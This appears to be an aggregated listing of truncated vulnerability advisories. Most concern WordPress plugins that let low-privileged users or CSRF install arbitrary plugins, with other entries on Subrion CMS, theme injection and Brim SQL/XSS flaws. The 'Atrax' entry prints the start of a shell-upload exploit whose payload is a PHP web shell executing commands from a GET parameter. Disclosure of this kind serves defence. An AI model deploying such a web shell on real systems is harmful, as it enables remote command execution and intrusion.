CVE-2021-24190
Low-privileged users can use the AJAX action 'cppluginsdobuttonjoblatercallback' in the WooCommerce Conditional Marketing Mailer WordPress plugin before 1.5.2 to install any plugin, including a specific version, from the WordPress repository, as well as activate arbitrary plugins on the blog,...
CVE-2021-24191
Low-privileged users can use the AJAX action 'cppluginsdobuttonjoblatercallback' in the WP Maintenance Mode & Site Under Construction WordPress plugin before 1.8.2 to install any plugin, including a specific version, from the WordPress repository, as well as activate arbitrary plugins on the blo...
CVE-2021-24191
The CVE-2021-24191 entry concerns the WordPress WP Maintenance Mode & Site Under Construction plugin (versions before 1.8.2). A low-privilege user can abuse the AJAX action cp_plugins_do_button_job_later_callback to install any plugin (including a specific version) from the WordPress repository a...
CVE-2021-24192 Tree Sitemap < 2.9 - Arbitrary Plugin Installation/Activation via Low Privilege User
Low-privileged users can use the AJAX action 'cppluginsdobuttonjoblatercallback' in the Tree Sitemap WordPress plugin before 2.9 to install any plugin, including a specific version, from the WordPress repository, as well as activate arbitrary plugins on the blog, which helps attackers install...
WordPress plugin Visitor Traffic Real Time Statistics security vulnerability
WordPress is a blogging platform from the WordPress Foundation, developed in PHP. The platform supports PHP and MySQL servers for setting up a personal blog site. WordPress Plugin is an open source application plugin for WordPress. A vulnerability exists in the WordPress plugin before...
WordPress plugin Tree Sitemap security vulnerability
WordPress is a blogging platform from the WordPress Foundation, developed in PHP. The platform supports PHP and MySQL servers for setting up a personal blog site. WordPress Plugin is an open source application plugin for WordPress. An authorization issue vulnerability exists in versions o...
WordPress plugin WooCommerce Conditional Marketing Mailer security vulnerability
WordPress is a blogging platform from the WordPress Foundation, developed in PHP. The platform supports PHP and MySQL servers for setting up a personal blog site. WordPress Plugin is an open source application plugin for WordPress. An authorization issue vulnerability exists in versions o...
Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via CSRF
The "cppluginsdobuttonjoblatercallback" AJAX action, found in multiple plugins from the WP-Buy vendor, lacked a CSRF check, allowing attackers to make a logged-in administrator install and activate arbitrary plugins, including a specific version, from the WordPress repository, which could lead to more...
Subrion Cross-Site Request Forgery Vulnerability
Subrion is a powerful and easy-to-use PHP content management system (CMS) with full source editing, per-page permissions, user activity monitoring and other powerful features. A cross-site request forgery vulnerability exists in panel/modules/plugins/ in Subrion 4.2.1. An attacker can exploit this...
CVE-2019-7357
Subrion CMS 4.2.1 has CSRF in panel/modules/plugins/. The attacker can remotely activate/deactivate the plugins...
Multiple Themes - Unauthenticated Function Injection
Jerome Bruandet, from nintechnet, discovered numerous themes affected by Unauthenticated Function Injection issues, due to the lack of capability and CSRF nonce checks in AJAX actions. The naturemag-lite theme partially fixed the issues in v1.0.5, however it has been removed from the WordPress...
Malware exploit: Atrax
Type: Shell Upload Vulnerability Author: Xylitol import random import string import base64 import urllib import urllib2 CONFIG payload = 'pre?php ifisset$GET"c"system$GET"c";else echo"No input?";?/pre' url = 'http://localhost/atrax/' /CONFIG BOTMODEINSERT = 'b' BOT MODE BOTMODERUNPLUGIN = 'e'...
CVE-2012-4422
wp-admin/plugins.php in WordPress before 3.4.2, when the multisite feature is enabled, does not check for network-administrator privileges before performing a network-wide activation of an installed plugin, which might allow remote authenticated users to make unintended plugin changes by leveragi...
CVE-2012-4422
CVE-2012-4422 affects WordPress prior to 3.4.2 with multisite enabled. The vulnerability arises when network-wide activation of plugins is performed without verifying network-administrator privileges, potentially allowing remote authenticated users to make unintended plugin changes by abusing the...
Brim 2.0.0 - SQL Injection Cross-Site Scripting
Brim 2.0.0 - SQL Injection / Cross-Site Scripting (advisory banner art omitted) ...
Brim 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities
Exploit for unknown platform in category web applications. Brim 2.0.0 SQL/XSS Multiple Remote Vulnerabilities. Found by: Fisher762. Groups: inj3ct0r...